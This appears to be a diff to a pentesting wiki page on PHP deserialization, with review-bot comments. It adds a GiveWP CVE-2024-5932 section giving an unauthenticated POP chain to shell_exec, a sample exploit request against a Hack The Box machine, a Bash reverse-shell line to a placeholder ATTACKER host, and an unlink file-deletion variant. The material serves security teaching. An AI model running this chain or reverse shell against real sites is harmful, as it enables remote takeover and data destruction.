Expand Up @@ -15,6 +15,9 @@ Steps:
- For that you use a deserialization where the name of the class is going to be inside **`$name`**. You **cannot use "/" or "."** in a class name in a serialized object, but the **code** is **replacing** the **underscores** ("\_") **for slashes** ("/"). So a class name such as `tmp_passwd` will be transformed into `/tmp/passwd.php` and the code will try to load it.\
A **gadget example** will be: **`O:10:"tmp_passwd":0:{}`**

<details>
<summary>spl_autoload_register autoload example</summary>

```php
spl_autoload_register(function ($name) {

Expand All @@ -37,6 +40,8 @@ spl_autoload_register(function ($name) {
});
```

</details>

> [!TIP]
> If you have a **file upload** and can upload a file with **`.php` extension** you could **abuse this functionality directly** and get already RCE.

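Review bot: The `</details>` closed here is opened in the previous hunk (`<summary>spl_autoload_register autoload example</summary>`), so the two hunks have to land together or the fenced `spl_autoload_register` block and everything after it renders inside an unclosed collapsible. Two wording nits while here: the summary says "autoload" twice (`spl_autoload_register example` is enough), and in the tip "get already RCE" reads better as "get RCE directly".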
Expand Down Expand Up @@ -97,11 +102,28 @@ The file is deleted as soon as the object falls out of scope. TCPDF 6.9.3 tighte

The call to `file_exists()` deserializes the metadata, instantiates TCPDF, and its destructor deletes the chosen file, turning html2pdf into a powerful `phar://` entry point. Version 5.3.1 added `Security::checkValidPath()` to block unapproved schemes, so legacy deployments remain attractive.

## References
### GiveWP <3.14.2 unauthenticated POP chain to RCE (CVE-2024-5932)

- [Positive Technologies – Blind Trust: What Is Hidden Behind the Process of Creating Your PDF File?](https://swarm.ptsecurity.com/blind-trust-what-is-hidden-behind-the-process-of-creating-your-pdf-file/)
**GiveWP** (WordPress donation plugin) up to **3.14.1** unserializes the user-controlled **`give_title`** field during `give_process_donation` without authentication. With the plugin’s dependencies autoloaded you get a **POP chain** that reaches a callable sink.

{{#include ../../banners/hacktricks-training.md}}
- The EQSTLab PoC builds a chain using `Stripe\StripeObject` and `Give\Vendors\Faker\ValidGenerator`, sets the internal `\0*\0validator` to `shell_exec`, and tucks the attacker command in `Give\Onboarding\SettingsRepository` data.
- POST the serialized payload as `give_title` to any donation form endpoint (e.g. `/donations/<slug>/`) with the offline gateway so no payment is attempted:

```http
POST /donations/the-things-we-need/ HTTP/1.1
Host: giveback.htb
Content-Type: application/x-www-form-urlencoded

amount=5&give-form-id=1&give-form-title=Any&give-gateway=offline&action=give_process_donation&give_title=O:31:"Stripe\StripeObject":1:{...serialized payload...}
```

- Output is **blind**, so use a **callback payload** such as a Bash reverse shell: `bash -c "bash -i >& /dev/tcp/ATTACKER/PORT 0>&1"` and listen with `nc -lnvp PORT`.
- The same chain can delete arbitrary files by pointing the sink at `unlink`. Use **phpggc** or the PoC (Python + `uv run CVE-2024-5932-rce.py -u <form_url> -c '<cmd>'`) to craft the blob, but any serializer able to emit PHP objects works.

## References

- [Positive Technologies – Blind Trust: What Is Hidden Behind the Process of Creating Your PDF File?](https://swarm.ptsecurity.com/blind-trust-what-is-hidden-behind-the-process-of-creating-your-pdf-file/)
- [HTB Giveback – CVE-2024-5932 GiveWP unauthenticated deserialization → RCE](https://0xdf.gitlab.io/2026/02/21/htb-giveback.html)
- [EQSTLab PoC – CVE-2024-5932 GiveWP RCE](https://github.com/EQSTLab/CVE-2024-5932)

{{#include ../../banners/hacktricks-training.md}}
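Review bot: The request example mixes concrete values from the HTB box (`Host: giveback.htb`, `/donations/the-things-we-need/`) with the placeholder form used in the bullet just above it (`/donations/<slug>/`); either use placeholders throughout or state that the request is the one captured from the HTB Giveback machine, otherwise the slug reads as a fixed path. The section also never states the fix explicitly: the heading says `<3.14.2` and the text `up to 3.14.1`, so add one sentence naming 3.14.2 as the patched release, the way the html2pdf paragraph above names `Security::checkValidPath()` in 5.3.1. Minor: `### GiveWP ...` sits one heading level below the html2pdf/TCPDF material it follows; confirm that level is intended, since this is a separate target rather than a sub-case of the `phar://` discussion.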